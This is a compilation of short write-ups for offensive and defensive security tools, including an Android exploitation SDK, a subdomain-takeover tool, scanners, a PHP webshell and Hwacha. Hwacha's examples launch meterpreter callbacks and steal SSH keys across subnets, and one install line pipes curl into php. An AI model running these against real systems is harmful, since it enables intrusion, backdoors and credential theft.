
LeakVM - Research & Pentesting Framework For Android, Run Security Tests Instantly


LeakVM: Run security tests instantly.

Why LeakVM:

LeakVM speeds up security testing on Android by skipping the time-consuming build of a pen-testing laboratory: you can test on real devices or virtual devices. LeakVM makes researchers and pen-testers more productive, since they can run tests in real time and with zero knowledge of malware development or attacks.

Our technology uses the same techniques used in criminal software, but in a controlled environment; you always have control over the SDK. Our product gives you a realistic approach against real malware and real attacks.

Why Pentesting:

With 2000 million active devices, 90% of mobile users are vulnerable to exploit kits (software vulnerabilities); cyber crime damage costs are expected to hit $6 trillion annually by 2021; mobile malware shows rapid growth in volume and sophistication; mobile security is a big data problem.

Unsecured devices and apps are the norm. In 2017 a new malware specimen emerged every 4.2 seconds. You need to reduce the threat surface.

Rewards:

Our platform is also designed so that anyone can make money with us, without any type of investment: by sharing your reseller link, each customer obtained through it brings you rewards. We currently have 3 methods of payment: Western Union, Wire Transfer and PayPal. These rewards are received for life; you just share a link.
For the first 100 customers: new client 20%, renewal 10%.
For the next 900 clients: new client 15%, renewal 10%.
After reaching 1000 clients: new client 10%, renewal 5%.

Questions:
Can I inject ELF/APK code inside the sandbox of any package?
Yes, you can.

Can I load external libraries?
Yes, from Git, Mediafire and other sources.

Can I start an HTTP service?
Yes, both synchronously and asynchronously.

Can I start an HTTP client?
Yes, we have one, and it is very configurable.

Can I analyze security on ELF as V.A.S?
Yes, you can.

Can I bypass OOP protections?
Yes; 'package', 'private', 'protected' and 'final' do not exist.

Can I extract private files from external packages?
Yes, you can see and get any file.

Can I hack the Keystore?
Yes, you can.

Can I trick the Context?
Yes, you can.

Can I hack the SmartLock?
Yes, you can.

Can I use reflection in a simple way?
Yes, you can.

Can I see the Linux system in a simple way?
Yes, you can.

Can I install it in a simple way?
Yes, with just 2 lines in the Gradle file.

Can I develop plugins with it?
Yes, in the same way as an AAR library.

Can anyone use it in a simple way?
Yes, we developed it for dummies.

Features:
  • Ptrace/ASLR/Yama Bypass
  • API for 3rd party projects
  • Linux common features
  • Dynamic library loading
  • SmartLock extraction
  • Private file extractor
  • KeyStore extraction
  • Advanced reflection
  • WebServices Engine
  • Privilege escalation
  • Context Spoofers
  • Core Observers
  • Library injection
  • OOP Bypass
  • Extensible

Support:
  • Android 4.4 to 6.0
  • Architectures Arm(32/64 bits), x86(32/64 bits), MIPS(32/64 bits)

Samples:
Where is the JavaDoc
How to configure a Virtual Device
How to install the LeakVM SDK
How to connect to the API
How to test Exploits
How to use Common IO methods
How to load libraries
How to Sudo & Runas
How to compile a native binary (ELF)
How to run loaded code
How to hack OOP
How to inject code (Native/VM)
How to build VM code to inject

Downloads:
LeakVM APP
LeakVM SDK 1.0.0

Web Interface:
LeakVM Console

Social Media:
Twitter
LinkedIn
Facebook
Instagram
LeakVM Developers Group




Rainmap Lite - Responsive Web Based Interface That Allows Users To Launch Nmap Scans From Their Mobiles/Tablets/Web Browsers

Rainmap Lite - Responsive web application that allows users to launch Nmap scans from their mobiles/tablets/web browsers!
Unlike its predecessor [1], Rainmap-lite does not require special services (RabbitMQ, PostgreSQL, Celery, supervisor, etc.), which makes it easy to install on any server. You simply need to install the Django application and add the cron polling task to set up a new scanning server. Nmap scans on the road for everyone!


Features
  • Easily launch Nmap scans with a few clicks.
  • Responsive interface runs smoothly from your phone/tablet.
  • Reports delivered by email in all formats.
  • View reports from your web browser.
  • Schedule scans.
  • Dozens of scanning profiles to choose from.
  • Easy to install/set up.
  • Share results with your team.
This project is still in beta version. Any feedback, bug reports and PRs are greatly appreciated!

Demo

Documentation
You can find all the documentation related to this project on the Wiki

Screenshots

* Responsive interface

* Customizable

* Scanning profiles

* Site Administration allows management of users, scanning profiles and scans

* Cron based

* Results delivered by email



SubOver - A Powerful Subdomain Takeover Tool


SubOver is a hostile subdomain takeover tool written in Python. From the start, it has been designed with speed and efficiency in mind. To date, SubOver detects 36 services, which is more than any other tool out there. The tool is multithreaded and hence fast. It can easily detect and report potential subdomain takeovers. The list of potentially hijackable services is very comprehensive, and it is what makes this tool so powerful.

Installing
You need to have Python 2.7 installed on your machine. The following additional Python packages are required:
  • dnspython
  • colorama
git clone https://github.com/Ice3man543/SubOver.git
cd SubOver
# consider installing virtualenv
pip install -r requirements.txt
python subover.py -h

Usage
python subover.py -l subdomains.txt -o output_takeovers.txt
  • -l subdomains.txt is the list of target subdomains. These can be discovered using various tools such as sublist3r or others.
  • -o output_takeovers.txt is the name of the output file. (Optional, and currently not very well formatted)
  • -t 20 is the default number of threads that SubOver will use. (Optional)
  • -V is the switch for showing verbose output. (Optional, default=False)

Currently Checked Services
  • Github
  • Heroku
  • Unbounce
  • Tumblr
  • Shopify
  • Instapage
  • Desk
  • Tictail
  • Campaignmonitor
  • Cargocollective
  • Statuspage
  • Amazonaws
  • Cloudfront
  • Bitbucket
  • Squarespace
  • Smartling
  • Acquia
  • Fastly
  • Pantheon
  • Zendesk
  • Uservoice
  • WPEngine
  • Ghost
  • Freshdesk
  • Pingdom
  • Tilda
  • Wordpress
  • Teamwork
  • Helpjuice
  • Helpscout
  • Cargo
  • Feedpress
  • Freshdesk
  • Surge
  • Surveygizmo
  • Mashery
Count : 36

FAQ
Q: What should my wordlist look like?
A: Your wordlist should include a list of subdomains you're checking and should look something like:
backend.example.com
something.someone.com
apo-setup.fxc.something.com

Your tool sucks!
Yes, you're probably correct. Feel free to:
  • Not use it.
  • Show me how to do it better.

Contact
Twitter: @Ice3man543

Credits


XSStrike v2.0 - An Advanced XSS Detection And Exploitation Suite


XSStrike is an advanced XSS detection suite. It has a powerful fuzzing engine and provides zero-false-positive results using fuzzy matching. XSStrike is the first XSS scanner to generate its own payloads. It is intelligent enough to detect and break out of various contexts.


Features
  • Powerful fuzzing engine
  • Context breaking technology
  • Intelligent payload generation
  • GET & POST method support
  • Cookie Support
  • WAF Fingerprinting
  • Hand crafted payloads for filter and WAF evasion
  • Hidden parameter discovery
  • Accurate results via the Levenshtein distance algorithm
To know more visit xsstrike.tk

Installation
XSStrike is compatible with all *nix based operating systems running Python 2.7. Why not Windows? My life, my rules. My code, my tools. Just kidding, it will run on Windows as well, but you will see some weird codes instead of colors. First of all, clone the repo by entering the following command in a terminal:
git clone https://github.com/UltimateHackers/XSStrike
Now navigate to the XSStrike directory:
cd XSStrike
Now install the requirements with the following command:
pip install -r requirements.txt
Now you can run XSStrike:
python xsstrike

Screenshots





Retire.Js - Scanner Detecting The Use Of JavaScript Libraries With Known Vulnerabilities


What you require you must also retire
There is a plethora of JavaScript libraries for use on the Web and in Node.JS apps out there. This greatly simplifies development, but we need to stay up-to-date on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 list of security risks, and insecure libraries can pose a huge risk to your Web app. The goal of Retire.js is to help you detect the use of JS-library versions with known vulnerabilities.
Retire.js can be used in many ways:
  1. As command line scanner
  2. As a grunt plugin
  3. As a gulp task
  4. As a Chrome extension
  5. As a Firefox extension
  6. As a Burp and OWASP Zap plugin

Command line scanner
Scan a web app or node app for use of vulnerable JavaScript libraries and/or Node.JS modules. In the source code folder of the application folder run:
$ npm install -g retire
$ retire

Grunt plugin
A Grunt task for running Retire.js as part of your application's build routine, or some other automated workflow.

Gulp task
An example of a Gulp task which can be used in your gulpfile to watch and scan your project files automatically. You can modify the watch patterns and (optional) Retire.js options as you like.
var gulp = require('gulp');
var spawn = require('child_process').spawn;
var gutil = require('gulp-util');

gulp.task('retire:watch', ['retire'], function (done) {
  // Watch all javascript files and package.json
  gulp.watch(['js/**/*.js', 'package.json'], ['retire']);
});

gulp.task('retire', function() {
  // Spawn Retire.js as a child process
  // You can optionally add option parameters to the second argument (array)
  var child = spawn('retire', [], {cwd: process.cwd()});

  child.stdout.setEncoding('utf8');
  child.stdout.on('data', function (data) {
    gutil.log(data);
  });

  child.stderr.setEncoding('utf8');
  child.stderr.on('data', function (data) {
    gutil.log(gutil.colors.red(data));
    gutil.beep();
  });
});

Chrome and firefox extensions
Scans visited sites for references to insecure libraries, and puts warnings in the developer console. An icon in the address bar will also indicate whether vulnerable libraries were loaded.

Burp and OWASP ZAP plugin
@h3xstream has adapted Retire.js as a plugin for the penetration testing tools Burp and OWASP ZAP. An alternative OWASP ZAP plugin exists at https://github.com/nikmmy/retire/


Webscreenshot - A Simple Script To Screenshot A List Of Websites


A simple script to screenshot a list of websites, based on the url-to-image phantomjs script.

Features
  • Integrating url-to-image 'lazy-rendering' for AJAX resources
  • Fully functional on Windows and Linux systems
  • Cookie and custom HTTP header definition support
  • Multiprocessing and killing of unresponsive processes after a user-definable timeout
  • Accepts several formats as input target
  • Maps useful options of phantomjs such as ignoring SSL errors, proxy definition and proxy authentication, HTTP Basic Authentication

Usage
Put your targets in a text file and pass it to the script (-i).
Screenshots will be available in your current ./screenshots/ directory (default).
Accepted input formats are the following:
http(s)://domain_or_ip:port(/ressource)
domain_or_ip:port(/ressource)
domain_or_ip(/ressource)

Options
$ python webscreenshot.py -h
Usage: webscreenshot.py [options]

Options:
-h, --help show this help message and exit

Main parameters:
-i INPUT_FILE, --input-file=INPUT_FILE
<INPUT_FILE>: text file containing the target list.
Ex: list.txt
-o OUTPUT_DIRECTORY, --output-directory=OUTPUT_DIRECTORY
<OUTPUT_DIRECTORY> (optional): screenshots output
directory (default './screenshots/')
-w WORKERS, --workers=WORKERS
<WORKERS> (optional): number of parallel execution
workers (default 2)
-v, --verbosity <VERBOSITY> (optional): verbosity level, repeat it to
increase the level { -v INFO, -vv DEBUG } (default
verbosity ERROR)

Input processing parameters:
-p PORT, --port=PORT
<PORT> (optional): use the specified port for each
target in the input list. Ex: -p 80
-s, --ssl <SSL> (optional): enforce ssl for every connection
-m, --multiprotocol
<MULTIPROTOCOL> (optional): perform screenshots over
HTTP and HTTPS for each target

HTTP parameters:
-c COOKIE, --cookie=COOKIE
<COOKIE_STRING> (optional): cookie string to add. Ex:
-c "JSESSIONID=1234; YOLO=SWAG"
-a HEADER, --header=HEADER
<HEADER> (optional): custom or additional header.
Repeat this option for every header. Ex: -a "Host:
localhost" -a "Foo: bar"
-u HTTP_USERNAME, --http-username=HTTP_USERNAME
<HTTP_USERNAME> (optional): specify a username for
HTTP Basic Authentication.
-b HTTP_PASSWORD, --http-password=HTTP_PASSWORD
<HTTP_PASSWORD> (optional): specify a password for
HTTP Basic Authentication.

Connection parameters:
-P PROXY, --proxy=PROXY
<PROXY> (optional): specify a proxy. Ex: -P
http://proxy.company.com:8080
-A PROXY_AUTH, --proxy-auth=PROXY_AUTH
<PROXY_AUTH> (optional): provides authentication
information for the proxy. Ex: -A user:password
-T PROXY_TYPE, --proxy-type=PROXY_TYPE
<PROXY_TYPE> (optional): specifies the proxy type,
"http" (default), "none" (disable completely), or
"socks5". Ex: -T socks
-t TIMEOUT, --timeout=TIMEOUT
<TIMEOUT> (optional): phantomjs execution timeout in
seconds (default 30 sec)

Examples
list.txt
--------
http://google.fr
https://173.194.67.113
173.194.67.113
https://duckduckgo.com/robots.txt


Default execution
-----------------
$ python webscreenshot.py -i list.txt
webscreenshot.py version 1.0

[+] 4 URLs to be screenshot
[+] 4 actual URLs screenshot
[+] 0 errors


Increasing verbosity level execution
-----------------------------------
$ python webscreenshot.py -i list.txt -v
webscreenshot.py version 1.1

[INFO][General] 'http://google.fr' has been formatted as 'http://google.fr:80' with supplied overriding options
[INFO][General] 'https://173.194.67.113' has been formatted as 'https://173.194.67.113:443' with supplied overriding options
[INFO][General] '173.194.67.113' has been formatted as 'http://173.194.67.113:80' with supplied overriding options
[INFO][General] 'https://duckduckgo.com/robots.txt' has been formatted as 'https://duckduckgo.com:443/robots.txt' with supplied overriding options
[+] 4 URLs to be screenshot
[INFO][http://173.194.67.113:80] Screenshot OK
[INFO][https://173.194.67.113:443] Screenshot OK
[INFO][http://google.fr:80] Screenshot OK
[INFO][https://duckduckgo.com:443/robots.txt] Screenshot OK
[+] 4 actual URLs screenshot
[+] 0 errors

Results
-------
$ ls -l screenshots/
total 61
-rwxrwxrwx 1 root root 35005 Jan 12 19:46 http___173.194.67.113_80.png
-rwxrwxrwx 1 root root 38152 Jan 12 19:46 http___google.fr_80.png
-rwxrwxrwx 1 root root 35005 Jan 12 19:46 https___173.194.67.113_443.png
-rwxrwxrwx 1 root root 12828 Jan 12 19:46 https___duckduckgo.com_443_robots.txt.png
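As an added example (not code from the webscreenshot project), the following Python reproduces the target normalisation and output naming shown in the log and listing above, for the three accepted input formats plus the -p, -s and -m options. The precedence of those options when they overlap is an assumption of this example, and the host check is an addition: a target list is often assembled from other tools' output, so lines containing anything other than a hostname or IP are rejected before they can reach the phantomjs command line or a filename.

```python
"""Target normalisation and output naming in the style of webscreenshot (added example)."""
import re

DEFAULT_PORTS = {"http": 80, "https": 443}

# Only plain hostnames / IPv4 literals are accepted as the host part; spaces, shell
# metacharacters and path separators are rejected up front.
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")

# Same four lines as the list.txt shown in the Examples section.
SAMPLE_LIST = """http://google.fr
https://173.194.67.113
173.194.67.113
https://duckduckgo.com/robots.txt
"""


def normalize_target(target, port=None, ssl=False, multiprotocol=False):
    """Expand one input line into fully qualified URL(s): scheme://host:port/resource.

    Accepted input formats (from the Usage section):
        http(s)://domain_or_ip:port(/resource)
        domain_or_ip:port(/resource)
        domain_or_ip(/resource)
    Option precedence is an assumption of this example, not documented tool behaviour:
    -p (port) overrides any port, -s (ssl) selects https for scheme-less targets,
    -m (multiprotocol) yields one http and one https URL for scheme-less targets.
    """
    target = target.strip()
    if not target:
        return []
    if "://" in target:
        scheme, rest = target.split("://", 1)
        scheme = scheme.lower()
        if scheme not in DEFAULT_PORTS:
            raise ValueError("unsupported scheme in %r" % target)
        schemes = [scheme]
    else:
        rest = target
        if multiprotocol:
            schemes = ["http", "https"]
        else:
            schemes = ["https"] if ssl else ["http"]

    hostport, slash, resource = rest.partition("/")
    resource = slash + resource          # '' when the line carried no resource
    host, _, inline_port = hostport.partition(":")
    if not HOST_RE.match(host):
        raise ValueError("invalid host in %r" % target)
    if inline_port and not (inline_port.isdigit() and 0 < int(inline_port) < 65536):
        raise ValueError("invalid port in %r" % target)

    urls = []
    for scheme in schemes:
        if port is not None:
            chosen = int(port)
        elif inline_port:
            chosen = int(inline_port)
        else:
            chosen = DEFAULT_PORTS[scheme]
        urls.append("%s://%s:%d%s" % (scheme, host, chosen, resource))
    return urls


def screenshot_filename(url):
    """Derive the PNG name the way the Results listing shows it: ':' and '/' become '_'."""
    return re.sub(r"[:/]", "_", url) + ".png"


def is_valid_target(target, **options):
    """True when the line normalises cleanly, False when it would be rejected."""
    try:
        normalize_target(target, **options)
        return True
    except ValueError:
        return False


def expand_list(text, **options):
    """Turn a whole list.txt into (url, filename) pairs, skipping blank lines."""
    pairs = []
    for line in text.splitlines():
        for url in normalize_target(line, **options):
            pairs.append((url, screenshot_filename(url)))
    return pairs


if __name__ == "__main__":
    pairs = expand_list(SAMPLE_LIST)
    print("[+] %d URLs to be screenshot" % len(pairs))
    for url, name in pairs:
        print("  %s -> screenshots/%s" % (url, name))
```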

Requirements
  • Python 2.7
  • webscreenshot python script:
    • The easiest way to set it up: pip install webscreenshot and then directly use $ webscreenshot
    • Or git clone that repository
  • Phantomjs > 2.x : follow the installation guide and check the FAQ if necessary

Changelog
  • version 2.1 - 01/14/2018: Multiprotocol option addition and PyPI packaging
  • version 2.0 - 03/08/2017: Adding proxy-type option
  • version 1.9 - 01/10/2017: Using ALL SSL/TLS ciphers
  • version 1.8 - 07/05/2015: Option groups definition
  • version 1.7 - 06/28/2015: HTTP basic authentication support + loglevel option changed to verbosity
  • version 1.6 - 04/23/2015: Transparent background fix
  • version 1.5 - 01/11/2015: Cookie and custom HTTP header support
  • version 1.4 - 10/12/2014: url-to-image phantomjs script integration + few bugs corrected
  • version 1.3 - 08/05/2014: Windows support + few bugs corrected
  • version 1.2 - 04/27/2014: few bugs corrected
  • version 1.1 - 04/21/2014: Changed the script to use phantomjs instead of the buggy wkhtml binary
  • version 1.0 - 01/12/2014: Initial commit

Contact
  • Thomas Debize < tdebize at mail d0t com >


Mooscan - A Scanner For Moodle LMS


A scanning tool for Moodle LMS.

Key Benefits
  • Allows administrators to determine exactly what is visible externally in their Moodle installation.
  • A tool for penetration testers to find potential vulnerabilities in a Moodle installation by enumerating installed plugins, themes and libraries.

Road Map
To be defined once the basic (MVP!) tool is released, functional and reliable.

    WhoAmIMailBot - A Service To Mask Your Email


    What is it?
    A service to mask your e-mails. It was inspired by the Blur service, where you create an alias for your e-mail and use it to sign up for applications. The problem with Blur is that all e-mails pass through their infrastructure, and I don't need anybody looking at my e-mails. To solve that, I created WhoAmIMailBot, which is similar to the Blur service but runs on your own infrastructure.

    How it works?
    Basically you need a domain (to avoid spending money you can use no-ip services), one VPS that allows SMTP outbound, a Telegram bot id, your Telegram user id and this project; when you have all these things, you're ready to go. Your VPS will run a Postfix instance that just redirects e-mails using Postfix's virtual alias function, where you map an e-mail address so that all incoming messages for it are redirected to another e-mail address. The no-ip domain will be the domain you use in your alias e-mails, and the Telegram bot will manage your aliases.

    Install
    git clone https://github.com/mthbernardes/WhoAmIMailBot.git
    cd WhoAmIMailBot
    docker build -t whoamimailbot --build-arg domain=your-domain-goes-here.ddns.net .
    docker run -p 25:25 -d -v /data/postfix/:/data whoamimailbot -t telegram-bot-api -d your-domain-goes-here.ddns.net -i your-telegram-user-id,another-telegram-user-id

    Usage
    On your Telegram bot you have the following commands:
    Command               Description
    /list                 List all available aliases
    /new mail@mail.com    Create a new alias for the given mail
    /delete bystring      Delete an alias by a given string



    Envizon - Network Visualization Tool With Focus On Red / Blue Team Requirements

    This tool is designed, developed and supported by evait security. In order to give something back to the security community, we publish our internally used and developed, state of the art network visualization and organization tool, 'envizon'. We hope your feedback will help to improve and hone it even further.

    Core Features:
    • Scan networks with predefined or custom nmap queries
    • Order clients with preconfigured or custom groups
    • Search through all attributes of clients and create complex linked queries
    • Get an overview of your targets during pentests with predefined security labels
    • Save and reuse your most used nmap scans
    • Collaborate with your team on the project in realtime
    • Export selected clients in a text file to connect other tools fast

    How to start?!
    To avoid compatibility and dependency issues, and to make it easy to set up, we use Docker. You can build your own images or use prebuilt ones from Docker Hub.

    Using Docker
    Docker and Docker Compose are required.
    git clone https://github.com/evait-security/envizon
    cd envizon
    # Create self-signed certificates:
    mkdir .ssl
    openssl req -x509 -sha256 -nodes -newkey rsa:2048 -days 365 -keyout .ssl/localhost.key -out .ssl/localhost.crt
    # If you want to use certificates located elsewhere, provide their paths with SSL_CERT_PATH and SSL_KEY_PATH
    # Create a secret, if you have rails installed locally you can just use:
    rails secret
    # otherwise, use openssl:
    openssl rand -hex 64
    # this needs to be provided either as an environment variable (SECRET_KEY_BASE), or added in the docker-compose.yml
    sudo docker-compose up

    Development
    If, for whatever reason, you want to run the development environment in production, you should probably consider changing the secrets in config/secrets.yml, and maybe even manually activating SSL.
    git clone https://github.com/evait-security/envizon
    cd envizon
    sudo docker-compose -f docker-compose-development.yml up
    Running tests:
    docker exec -it envizon_container_name_1 /bin/ash -c 'rails test'

    Without Docker
    Requires a PostgreSQL server.
    Create a database envizon with a user envizon. Password and socket location can be modified in the docker-compose.yml. Your user needs SUPERUSER privileges; otherwise database import (and tests) won't work, because of foreign key constraints: use ALTER USER user WITH SUPERUSER;.
    git clone https://github.com/evait-security/envizon
    cd envizon
    bundle install --path vendor/bundle
    You need to create a secret and SSL certificates, as described above.
    Then, run it with:
    RAILS_ENV=production
    export RAILS_ENV
    SECRET_KEY_BASE=YOUR_SECRET
    export SECRET_KEY_BASE
    bundle exec rails db:setup
    bundle exec rails db:migrate
    bundle exec rails db:seed
    bundle exec rails assets:precompile
    RAILS_FORCE_SSL=true RAILS_SERVE_STATIC_FILES=true bundle exec rails s

    Development
    Databases for development and testing are called envizon_test and envizon_development, with the same requirements as above. Different database names and credentials can be provided via environment variables or directly modified in config/database.yml
    git clone https://github.com/evait-security/envizon
    cd envizon
    bundle install --path vendor/bundle
    RAILS_ENV=development
    export RAILS_ENV
    bundle exec rails db:setup
    bundle exec rails db:migrate
    bundle exec rails db:seed
    bundle exec rails s
    To run the tests:
    RAILS_ENV=test bundle exec rails db:setup
    bundle exec rails test

    Start with prebuilt images and postgresql docker image
    Coming Soon™

    Set a password
    After starting the docker images go to: https://localhost:3000/ (or http://localhost:3000 if not using SSL)
    You have to specify a password for your envizon instance. You can change it in the settings interface after logging in.


    Scan interface
    The scan interface is divided in two sections. On the left side you can run a new scan with preconfigured parameters or your own nmap fu. You also have the possibility to upload previously created nmap scans (with the -oX parameter).


    On the right side you will see your running and finished scans.


    Groups
    The group interface is the heart of envizon. You can select, group, order, quick search, global search, move, copy, delete and view your clients. The left side represents the group list. If you click on a group you will get a detailed view in the center of the page with the group content. Each client in a group has a link. By clicking on the IP address you will get a more detailed view on the right side with all attributes, labels, ports and nmap output.
    Most of the buttons and links have tooltips.


    Global Search
    In this section you can search for nearly anything in the database and combine each search parameter with 'AND', 'OR' & 'NOT'.
    Perform simple queries for hostname, IP, open ports, etc. or create combined queries like: hostname contains 'win' AND mac address starts with '0E:5C' OR has port 21 and 22 open.


    FAQ
    API ?!
    • Currently not. We will work on it. Maybe.
    Which browsers are supported?
    • Latest Chrome / Chromium / Inox & Firefox / Waterfox.
    Why rails?!
    • Wanted to learn ruby. It's cool.
    Why so salty on github issue discussion?
    • This is a community project. We are a full time pentesting company and will not go into / care about every open issue that doesn't match our template or guidelines. If you get a rough answer or picture, you probably deserved it.

    What frameworks and tools were used?

    Help?
    You can get some information about the structure and usage on the official wiki.
    https://github.com/evait-security/envizon/wiki


    Adhrit - Android APK Reversing And Analysis Tool That Can Help Security Researchers And CTF Enthusiasts Alike


    Adhrit is an open source Android APK reversing and analysis tool that can help security researchers and CTF enthusiasts alike. The tool is an effort to cut down on the amount of time spent on reversing and basic reconnaissance of Android applications. The project is still under progress and will continually incorporate features with time.

    USES:
    • Extracts the apk contents.
    • Disassembles native libraries
    • Extracts jar out of dex.
    • Extracts source code in Java.
    • Extracts source code in Smali.
    • Recompiles smali into APK
    • Signs the APK
    • Checks for bytecode injection points.
    • Analyzes permissions used by the application.
    • Dumps the Manifest.
    • Dumps the certificate details.
    • Checks for malware footprints in the VirusTotal database.

    PRE-REQUISITES:
    • Linux or Mac
    • Java JDK

    USAGE:
    1. Download the zip or clone the package and extract the tool ( git clone https://github.com/abhi-r3v0/Adhrit.git ).
    2. Place the application in the tool directory.
    3. Open a terminal and cd into the directory.
    4. Run python installer.py for installing the necessary tools.
    5. Use python adhrit.py -h for usage help.
    Example: python adhrit.py -a my_app.apk

    SCREENSHOTS:






    NOTE:
    1. Filenames with two '.' may give an error. Please rename the apk in such cases. For example, if your file name is my.app.apk, rename it to myapp.apk


    Physics Platform - A Remote Hardware Hacking Platform


    Physics platform is a tool for hardware systems (e.g. Raspberry Pi 3B). It retrieves data passing through the network and sends it to a control panel. It works the same way as a botnet, receiving remote commands (you can think of it as a black box).

    Physics hardware
    You can check the physics-hardware repository.

    INSTALLATION
    1. composer update
    2. generate .env with database information
    3. php artisan migrate
    4. php artisan physics:createUser username password
    5. php artisan key:generate
    6. point your domain at the public/ folder.
    7. configure a cronjob (* * * * * php /physics-commandProject/artisan schedule:run >> /dev/null 2>&1)


    Hwacha - Deploy Payloads To *Nix Systems En Masse


    Hwacha is a tool to quickly execute payloads on *Nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.
    $python hwacha.py 
    [Hwacha ASCII-art banner. Created by Esteban Rodriguez / Web: https://www.n00py.io / Twitter: @n00py1]
    To run commands, use -x [COMMAND]
    to run modules, use -m [MODULE]
    to specify module options, use -o [ARG=ARG ARG=ARG]
    to see all available modules, use -L
    Example usage:
    python hwacha.py -t 192.168.1.1/24 -u admin -p password
    python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
    python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
    python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"


    Available Modules:
    [*] meterpreter Use this to execute a meterpreter agent on the target(s).
    REQURED ARGUMENTS: LHOST , LPORT
    OPTIONAL ARGUMENTS: TYPE {python, php, 32, 64, osx}
    [*] mimipenguin Use this to execute a mimipenguin on the target(s) to recover credentials. (Requires root)
    OPTIONAL ARGUMENTS: LHOST, LPORT
    [*] keys Use this to collect SSH private keys from the target(s).
    [*] history Use this to collect shell history files from the target(s).
    [*] privs Use this to enumerate sudo privileges on the targets(s).
    [*] backdoor Creates an RSA key pair and adds public key to authorized_keys file on targets(s).
    [*] web_delivery Use this to execute a python script on the target(s).
    REQURED ARGUMENTS: PATH
    OPTIONAL ARGUMENTS: LISTEN
    [*] custom_bin Use this to execute a custom binary on the target(s).
    REQURED ARGUMENTS: PATH
    [*] sudo_exec Use this to execute a custom binary (with sudo) on the target(s).
    REQURED ARGUMENTS: PATH
    [*] shellcode Use this to execute custom shellcode on the target(s).
    REQURED ARGUMENTS: PATH
    Requires paramiko:
    pip install paramiko 

    More info: https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/


    B4Tm4N - PHP WEBSHELL


    Features
    • [0] File Manager
    • [1] Sec. Info
    • [2] Simply Database
    • [3] Interactive terminal
    • [4] PHP Reverse Back Connect
    • [5] Run PHP Code
    • [6] Custom Toolz
    • [7] Self Script Encryptor !

    53R3N17Y - Python Based Script For Information Gathering



    Python based script for Information Gathering.

    Operating Systems Tested
    • OSX El Capitan 10.11
    • Ubuntu 16.04
    • Backbox 5

    Install

    MacOSX
    (as root)
    git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity
    # append (>>) rather than overwrite (>) your shell rc; the alias has to cd into the directory before running the script
    echo 'alias serenity="cd /usr/local/share/serenity && ./serenity"' >> ~/.zshrc
    cd /usr/local/share/serenity
    pip install -r requirements.txt
    serenity -h

    Linux
    (as root)
    git clone https://github.com/abaykan/53R3N17Y.git /usr/local/share/serenity
    # append (>>) rather than overwrite (>) your shell rc; the alias has to cd into the directory before running the script
    echo 'alias serenity="cd /usr/local/share/serenity && ./serenity"' >> ~/.bashrc
    cd /usr/local/share/serenity
    pip install -r requirements.txt
    serenity -h
    note: tested with Python 2.7.14


    Magescan - Scan A Magento Site For Information


    The idea behind this is to evaluate the quality and security of a Magento site you don't have access to. The scenario is when you're interviewing a potential developer or vetting a new client and want to have an idea of what you're getting into.

    Installation

    .phar
    php magescan.phar scan:all www.example.com

    Source
    • Clone this repository
    • Install with composer
    git clone https://github.com/steverobbins/magescan magescan
    cd magescan
    curl -sS https://getcomposer.org/installer | php
    php composer.phar install
    bin/magescan scan:all www.example.com

    n98-magerun
    Clone into your ~/.n98-magerun/modules directory
    mkdir -p ~/.n98-magerun/modules
    git clone https://github.com/steverobbins/magescan ~/.n98-magerun/modules/magescan
    magerun magescan:scan store.example.com

    Composer
    composer require steverobbins/magescan --dev

    Include in your project
    Add the following to your composer.json
    "require": {
    "steverobbins/magescan": "dev-master"
    }

    Usage
    $ magescan.phar scan:all store.example.com

    Commands

    scan:all
    $ magescan.phar scan:all [--insecure|-k] [--show-modules] <url>
    Run all scans on the given <url>.

    Options

    --format=FORMAT
    Specify a different output format. Possible values:
    • default
    • json

    --insecure, -k
    If set, SSL certificates won't be validated

    --show-modules
    Lists all modules searched for, not just those found

    scan:catalog
    $ magescan.phar scan:catalog [--insecure|-k] <url>
    Get catalog information

    scan:modules
    $ magescan.phar scan:modules [--insecure|-k] [--show-modules] <url>
    Get installed modules

    scan:patch
    $ magescan.phar scan:patch [--insecure|-k] <url>
    Get patch information

    scan:server
    $ magescan.phar scan:server [--insecure|-k] <url>
    Check server technology

    scan:sitemap
    $ magescan.phar scan:sitemap [--insecure|-k] <url>
    Check sitemap

    scan:unreachable
    $ magescan.phar scan:unreachable [--insecure|-k] <url>
    Check unreachable paths

    scan:version
    $ magescan.phar scan:version [--insecure|-k] <url>
    Get the version of a Magento installation

    self-update
    $ magescan.phar self-update
    Updates the phar file to the latest version.



    Pyfiscan - Web-Application Vulnerability And Version Scanner


    Pyfiscan is a free web-application vulnerability and version scanner that can be used to locate outdated versions of common web applications on Linux servers. An example use case is hosting providers keeping an eye on their users' installations to keep up with security updates. Fingerprints are easy to create and modify, as the user can write them in YAML syntax. Pyfiscan also contains a tool to create email alerts using templates.

    Requirements
    • Python 2.7
    • Python modules PyYAML docopt
    • GNU/Linux web server
    Testing is done mainly with GNU/Linux Debian stable. Windows is not currently supported.

    Detects following software
    • ATutor
    • b2evolution
    • BigTree CMS
    • Bugzilla
    • Centreon
    • Claroline
    • ClipperCMS
    • CMSimple
    • CMSMS
    • Collabtive
    • Concrete5
    • Coppermine
    • Cotonti
    • Croogo
    • CubeCart
    • Dolibarr
    • Dotclear
    • Drupal
    • e107
    • EspoCRM
    • Etherpad
    • FluxBB
    • Foswiki
    • Gallery
    • Gollum
    • HelpDEZk
    • HumHub
    • ImpressCMS
    • ImpressPages
    • Jamroom
    • Joomla
    • Kanboard
    • KCFinder
    • LiteCart
    • Magnolia
    • Mahara
    • MantisBT
    • MediaWiki
    • Microweber
    • MiniBB
    • MODX Revolution
    • MoinMoin
    • MyBB
    • Nibbleblog
    • Open Source Social Network
    • OpenCart
    • osDate
    • ownCloud
    • Oxwall
    • PBBoard
    • phpBB3
    • PhpGedView
    • phpMyAdmin
    • Piwigo
    • Piwik
    • PmWiki
    • Postfix Admin
    • Redaxo
    • Roundcube
    • SaurusCMS
    • Serendipity
    • Shaarli
    • SMF
    • Spina CMS
    • SPIP
    • SquirrelMail
    • TestLink
    • TikiWiki
    • Trac
